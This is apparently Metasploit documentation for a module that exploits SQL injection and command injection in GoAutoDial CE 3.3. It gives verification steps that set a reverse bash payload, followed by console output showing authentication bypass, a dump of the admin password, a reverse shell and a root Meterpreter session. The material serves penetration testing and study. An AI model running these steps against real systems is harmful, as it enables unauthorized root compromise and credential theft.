metasploit-gs/documentation/modules/exploit/linux/goautodial_3_rce_code_injection.md

Description

This module exploits a SQL injection flaw and a command injection flaw in GoAutoDial CE 3.3, which permit authentication bypass and complete compromise of the underlying system with root privileges. The module also extracts the administrative user's password from the underlying database.

Affected software

GoAutoDial 3.3 CE (32-bit and 64-bit) is available for download from goautodial.org. To download it, register a free account, then download the bootable ISOs. Both ISOs were used during development of this module.

http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html

Refer to: https://www.exploit-db.com/exploits/36807/

Verification

Steps to verify that the module works:

  • Start msfconsole
  • Do use exploit/linux/http/goautodial_3_rce_command_injection
  • Do set payload cmd/unix/reverse_bash
  • Do set RHOST <IP>
  • Do set LHOST <IP>
  • Do set LPORT <PORT>
  • Wait for shell

msf exploit(goautodial_3_rce_command_injection) > check
[+] 192.168.0.76:443 The target is vulnerable.
msf exploit(goautodial_3_rce_command_injection) > exploit -z

[*] Started reverse TCP handler on 192.168.0.11:4444 
[*] 192.168.0.76:443 - Trying SQL injection...
[+] Authentication Bypass (SQLi) was successful
[*] 192.168.0.76:443 - Dumping admin password...
[+] admin|goautodial|Admin|||Y
[*] 192.168.0.76:443 - Sending payload...waiting for connection
[*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000
[*] Session 7 created in the background.
msf exploit(goautodial_3_rce_command_injection) > sessions -u 7
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7]

[*] Upgrading session ID: 7
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.11:4433 
[*] Starting the payload handler...
[*] Sending stage (797784 bytes) to 192.168.0.76
[*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(goautodial_3_rce_command_injection) > sessions -i 8
[*] Starting interaction with 8...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : test
OS           : CentOS 5.10 (Linux 2.6.18-371.11.1.el5)
Architecture : x64
Meterpreter  : x86/linux